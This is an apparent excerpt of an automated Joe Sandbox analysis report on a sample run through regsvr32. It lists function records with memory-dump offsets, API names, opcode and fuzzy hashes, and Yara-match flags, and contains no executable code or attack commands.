                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _errno$__tzset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3587134695-0
                                                                                                                                                • Opcode ID: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                                                                                                • Instruction ID: c2a14873644e6fbcb57f1dca012b0a90d346a55522f5577df9e8e5aabc28bdd0
                                                                                                                                                • Opcode Fuzzy Hash: 49cb08095e24ca39ac522c7ec604242f23efb3d68850c8b05a0144016971d7f9
                                                                                                                                                • Instruction Fuzzy Hash: 26029632A0C6AAC7E7748F2AD8B853D27A2FF44749F24483AD74E46691DE38D944C731
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _errno$DecodePointer_lock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2175075375-0
                                                                                                                                                • Opcode ID: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                                                                                                • Instruction ID: b703e3e93b8c386c801852b16e8847f0c27d5fbf45af061186059ec6b2283983
                                                                                                                                                • Opcode Fuzzy Hash: 67eb2a1810ee8ae3a6f200ab40374a5628c10f79bc737fdb0890b88123cf569c
                                                                                                                                                • Instruction Fuzzy Hash: 97319E21B4C76BC2FB65DA63957A37B6291AF58388F044C34DE4D47A85EE2CE400CA38
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • RtlCaptureContext.KERNEL32 ref: 00007FFC6720D357
                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFC6720D39D
                                                                                                                                                • UnhandledExceptionFilter.KERNEL32 ref: 00007FFC6720D3A8
                                                                                                                                                  • Part of subcall function 00007FFC67206F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFC67207194,?,?,?,?,00007FFC67206C69,?,?,00000000,00007FFC672030C0), ref: 00007FFC67206FCF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2731829486-0
                                                                                                                                                • Opcode ID: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                                                                                                • Instruction ID: 07f6551347c06fa2e93bf1b2ca8e16bef34ef986d3fcd7c33d36eb8829e8c7be
                                                                                                                                                • Opcode Fuzzy Hash: 593c6449df1015ae3e331ed563d16e9abc9156b94907c07056c7b3d83921dabb
                                                                                                                                                • Instruction Fuzzy Hash: 95115B3562C6AAC2E7249B52E46477A6791FF85308F440639E64D02B95DF3DE104CB31
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: *4$5F$S^r
                                                                                                                                                • API String ID: 0-3556444313
                                                                                                                                                • Opcode ID: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
                                                                                                                                                • Instruction ID: 3ee7e47d854a132278560872cba22db18b0762c6b33e49020313469b2ebed1ad
                                                                                                                                                • Opcode Fuzzy Hash: b0743c1ec2acfd1e8c25e2f2eb51529e5db6bb1cba9eb6ae32e5b6bbd2ab9b57
                                                                                                                                                • Instruction Fuzzy Hash: 5542F87154478C8BDBB8CF28C88D7DE7BE0FB54344F20461DE9AA8A261DBB49685CF41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: &lz2$'~W$<x<
                                                                                                                                                • API String ID: 0-2268522332
                                                                                                                                                • Opcode ID: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
                                                                                                                                                • Instruction ID: 36e71a14450f7168630c03d0025ff7d4b6ed06a40f4a953d8196177a15a51c97
                                                                                                                                                • Opcode Fuzzy Hash: b4611eb32689572206be92ce00cd3efb5fa8211b09b44c780cf48fb277428f5a
                                                                                                                                                • Instruction Fuzzy Hash: 47E10574A14B0C8BDB69DFB8D04A6CDBBF2FB54344F20411DE80AAB292D7B49519CF85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: o6.$s8Q${Fl&
                                                                                                                                                • API String ID: 0-2665016659
                                                                                                                                                • Opcode ID: 511a0316ce8a18d61ca04810737b4ff370b750d3f2d96c2fe29b5a7c249dfd58
                                                                                                                                                • Instruction ID: 345269621f88c341702fdf3610a73dbdf39058324611beb6fba665c489d4de0b
                                                                                                                                                • Opcode Fuzzy Hash: 511a0316ce8a18d61ca04810737b4ff370b750d3f2d96c2fe29b5a7c249dfd58
                                                                                                                                                • Instruction Fuzzy Hash: 48E1D7705087C88BDBFEDF64C88A7DA7BACFB44708F105219EA4A8E258DB745749CB41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: $$T]0$ba^2
                                                                                                                                                • API String ID: 0-1276948933
                                                                                                                                                • Opcode ID: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                                                                                                • Instruction ID: eef8b44dd2583dc88dd368a4c81b8d58a3d6fa2c6a2b719c97d70d037daa09dd
                                                                                                                                                • Opcode Fuzzy Hash: 50dab8274baf4b038fc4b99f186c2c7516c76bbdb2714b9ce32fb6facc3b6c7a
                                                                                                                                                • Instruction Fuzzy Hash: 1CD11470510748DBCB99CF24C88AADD7FB1FB483A8FA42219FD06A7260C775D984CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 6w5*$EDO$V
                                                                                                                                                • API String ID: 0-1640223502
                                                                                                                                                • Opcode ID: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                                                                                                • Instruction ID: 2aad62a72125add12bf3ce521e9508149cfd3cbf44ea5784fb3c25a9d2cdfef8
                                                                                                                                                • Opcode Fuzzy Hash: ed1df3146ad4429725400e2b1b62204332b0e2ca82f1b7aeb1a5f2c194113b0e
                                                                                                                                                • Instruction Fuzzy Hash: 07B1E67160560ECFCB88DF28C5866DE3BE0FB48318F41422AF90AA7354D774DA68CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: Y()$i_"o$|Y
                                                                                                                                                • API String ID: 0-942011364
                                                                                                                                                • Opcode ID: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                                                                                                • Instruction ID: 0f698cdcb9f5af38e2ff44253ec0ac71ef144d8643f40abc7fb7ff20982184b6
                                                                                                                                                • Opcode Fuzzy Hash: 99e19844c70b9c0f3275fee4d9e8598d8799ff7d5c60b779fef480da3ab0ff5c
                                                                                                                                                • Instruction Fuzzy Hash: 5AC1F7706083889FDBBEDF28C8857CA7BA9FB46708F504519EDC98E254DB745744CB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: O)$,G$-
                                                                                                                                                • API String ID: 0-23008916
                                                                                                                                                • Opcode ID: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                                                                                                • Instruction ID: 8302e34eee3504d26b36c965fbed976e69713b67a0f5c478fb5ffa9ec871fbb1
                                                                                                                                                • Opcode Fuzzy Hash: 382f6eb2118395d632dba3a2cf122cd3a475215dc83456f13dd86c7c3519a1e5
                                                                                                                                                • Instruction Fuzzy Hash: 6E81F7705106499BCF88DF28C8D6ADD7FB1FB483A8F956219FD0AA6250C774D885CB84
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: ;U[$L$Q#
                                                                                                                                                • API String ID: 0-2933747092
                                                                                                                                                • Opcode ID: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                                                                                                • Instruction ID: c6ef39cbec2f0f72f24e8f037401308b0178ea645a608ff4f3f67d7bb634a9bb
                                                                                                                                                • Opcode Fuzzy Hash: 48c80cf55519f04e9394a4cd7563c786fdb29e452e8ba8fdd2d4b1674bf817ce
                                                                                                                                                • Instruction Fuzzy Hash: 0B614E70A0870CAFDB48DF94C14AADDBBF2FB54344F0081A9E806AB251D7B59B59CB85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 5($<:*$qwX
                                                                                                                                                • API String ID: 0-3944236288
                                                                                                                                                • Opcode ID: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                                                                                                • Instruction ID: 7f83292775578326f1885df61e48a3f2c5c3ff73894a37d4b388f2926162ec41
                                                                                                                                                • Opcode Fuzzy Hash: 3ff6daddd3fc5570497b4afa6ac41a8054238f95a4c1d79c70cc8b829639e233
                                                                                                                                                • Instruction Fuzzy Hash: 5B71067015878CDBEBBADF24C8897DD3BB0FB49344F90861AE84E8A250CF74574A9B41
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 79&$s`~$v;
                                                                                                                                                • API String ID: 0-3844292866
                                                                                                                                                • Opcode ID: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                                                                                                • Instruction ID: c39f2861ae99e8b3f2b4a79ea52bf03a0f7a6e48d35fb935a0be7420e121cddb
                                                                                                                                                • Opcode Fuzzy Hash: beca5e7b89ed182e00fd219d55149b62bdd99575566975f419d1c5ca8939f9e6
                                                                                                                                                • Instruction Fuzzy Hash: 9B61397110478CAFDBFA9E58CC85BDD37A0FB48348F508229E9098B290DF749B4D9B46
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: wQ_$1_$ac
                                                                                                                                                • API String ID: 0-1037425278
                                                                                                                                                • Opcode ID: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                                                                                                • Instruction ID: 5ab913ef515fd25bf7fc04ce61f78e9cde1e7d2fd73709943c0f3a5cbb59c84a
                                                                                                                                                • Opcode Fuzzy Hash: 943c7c2c61714b72029a8fd813d6c42c5c92d180aed6d879ae2838ea4b2e708e
                                                                                                                                                • Instruction Fuzzy Hash: 1D612B7010978C8BDBF8CF54DC997EA3BA6FB54345F208519E84E8A270DB74968CCB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: )K$U|$|1-
                                                                                                                                                • API String ID: 0-2543966960
                                                                                                                                                • Opcode ID: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                                                                                                • Instruction ID: 8eb6a9a016547b1518e90ac2546dd564535e4ecbba9ac8d240a0a1c3e9042cf5
                                                                                                                                                • Opcode Fuzzy Hash: 5f28dff232c1c58b23d465856644a80aed22efa063cacd8378c131e5813de89a
                                                                                                                                                • Instruction Fuzzy Hash: 1151D57160438CAFDBF6CE64D8857CA37A0AB06354F608129A89D8A291DBB4578DCB02
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: 6|$6`d$H~z
                                                                                                                                                • API String ID: 0-1702722476
                                                                                                                                                • Opcode ID: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                                                                                                • Instruction ID: dff368548e7284a50638b46c1e9eca52edd1bdea535486c94ebb7356abcac70e
                                                                                                                                                • Opcode Fuzzy Hash: 6487df39d46446a395b722702bbc9accbfbbf10f6bdf8a05bf21e92dd4d708c3
                                                                                                                                                • Instruction Fuzzy Hash: C351F37190074DDFCF48DFA4D98A5DEBBB0FB48308F118659E89AA7260C7B89A44CF45
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: d~$`5$t>
                                                                                                                                                • API String ID: 0-1282322184
                                                                                                                                                • Opcode ID: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                                                                                                • Instruction ID: 2b9aad7a7c3990d0f54026c4e2bc5a00c5a3c031faa8fbf8ed0394cc09118e70
                                                                                                                                                • Opcode Fuzzy Hash: 5ab2e5105061d0cdd7dd2083328b31dc67734e2d6c9a8d2650bd0306db7847c6
                                                                                                                                                • Instruction Fuzzy Hash: 9141B2B190078ECBCF48DFA8C88A1DE7BB0FB58358F104A19E965A6250D3B49664CF84
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: #St$JYr$hmn
                                                                                                                                                • API String ID: 0-1556749129
                                                                                                                                                • Opcode ID: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                                                                                                • Instruction ID: 771f7f328e054501a5ac5c786693eba7885e85f29817745d48b7f08549072e32
                                                                                                                                                • Opcode Fuzzy Hash: 8c5881788024da3e2945e5a9e10c631b66cff36ab1256063138a18bf82cfdc40
                                                                                                                                                • Instruction Fuzzy Hash: 9141A2B590038E8FCF48CF68C9865DF7BB0FB58358F104A19E866A6250D3B8D665CF85
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: TGA$K$W}
                                                                                                                                                • API String ID: 0-588348707
                                                                                                                                                • Opcode ID: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                                                                                                • Instruction ID: 925d7415f36b0b7642ffd9188936a5d9ffa2c4cac62ef92b2c466baf2dc1674c
                                                                                                                                                • Opcode Fuzzy Hash: 6f9a2f9587d8e5dd3523940eb2aee6104e1c9ad2b61c16d7289d24ecd03a1c44
                                                                                                                                                • Instruction Fuzzy Hash: E041C2B480038E8FCB88DF68D8865DE7BB0FB58358F10461DF82AA6254D3B49664CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: :1,$@H${C=
                                                                                                                                                • API String ID: 0-2737386091
                                                                                                                                                • Opcode ID: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                                                                                                • Instruction ID: ceb57f34bb3f34c1ea772447f295c080a735f780389ac7edd693abfe49cb3e58
                                                                                                                                                • Opcode Fuzzy Hash: 644fe5c2a8aa80c3bc0818b82038798635fbfb77325ece216352586eb067b324
                                                                                                                                                • Instruction Fuzzy Hash: B641E6B090078E8FCF48DF68C98A5DE7BB0FB58348F104A1DE856A6250D3B4D665CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: prP$q<C$uL
                                                                                                                                                • API String ID: 0-1414207395
                                                                                                                                                • Opcode ID: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                                                                                                • Instruction ID: cc3a3a13117e67edb5dc9e3fadb8c1066889dae633948d8cd9104a976a047d4b
                                                                                                                                                • Opcode Fuzzy Hash: 2ae9b2111e30b1203ae6799d8d29bbb45b968934521661f86bb08c7d67e7e9b2
                                                                                                                                                • Instruction Fuzzy Hash: 1031B1B180434E9FCB48DF68C88A5DE7FB0FB58358F10961DE85AA6260D3789695CFC4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280788460.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: :00D$Kl$(R'
                                                                                                                                                • API String ID: 0-3661897330
                                                                                                                                                • Opcode ID: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                                                                                                • Instruction ID: 113703a4c5f13be184801d5493027e38acd6d1afb500234bb699672912ccf9eb
                                                                                                                                                • Opcode Fuzzy Hash: 85d3200e76e47dbb67993755bb0ce797b19f94abe7489bd39968e35e8c3a1c76
                                                                                                                                                • Instruction Fuzzy Hash: CA216F74618B848BD74CDF28C46551EBBE1BB8C718F440B1DF4CAAA354D778D6058B4A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _getptd.LIBCMT ref: 00007FFC6720597E
                                                                                                                                                  • Part of subcall function 00007FFC67206550: RtlCaptureContext.KERNEL32 ref: 00007FFC6720658F
                                                                                                                                                  • Part of subcall function 00007FFC67206550: IsDebuggerPresent.KERNEL32 ref: 00007FFC6720662D
                                                                                                                                                  • Part of subcall function 00007FFC67206550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFC67206637
                                                                                                                                                  • Part of subcall function 00007FFC67206550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFC67206642
                                                                                                                                                  • Part of subcall function 00007FFC67206550: GetCurrentProcess.KERNEL32 ref: 00007FFC67206658
                                                                                                                                                  • Part of subcall function 00007FFC67206550: TerminateProcess.KERNEL32 ref: 00007FFC67206666
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                                                                                                • String ID: C
                                                                                                                                                • API String ID: 1583075380-1037565863
                                                                                                                                                • Opcode ID: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                                                                                                • Instruction ID: 8beb57b438eb2c15fb64f3386fc043456f7585ee5c3b746e9d13d71cbffc4f28
                                                                                                                                                • Opcode Fuzzy Hash: 10b8f8e64b2f2c6b57eebdc268e2529a4342badfac4ad9c6369cf06c32040822
                                                                                                                                                • Instruction Fuzzy Hash: 7051A662B1C66AC1EA649B2394797BB5790FF84B88F448831EE4D47789DE3CE095C730
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.280880041.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                                • Associated: 00000002.00000002.280872682.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280938947.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280956305.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                • Associated: 00000002.00000002.280987525.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoLocale_getptd
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3731964398-0
                                                                                                                                                • Opcode ID: 3ee99f9ceacccca0b475531418f3f0bad8631950249c9606f8709888dfed1ca9
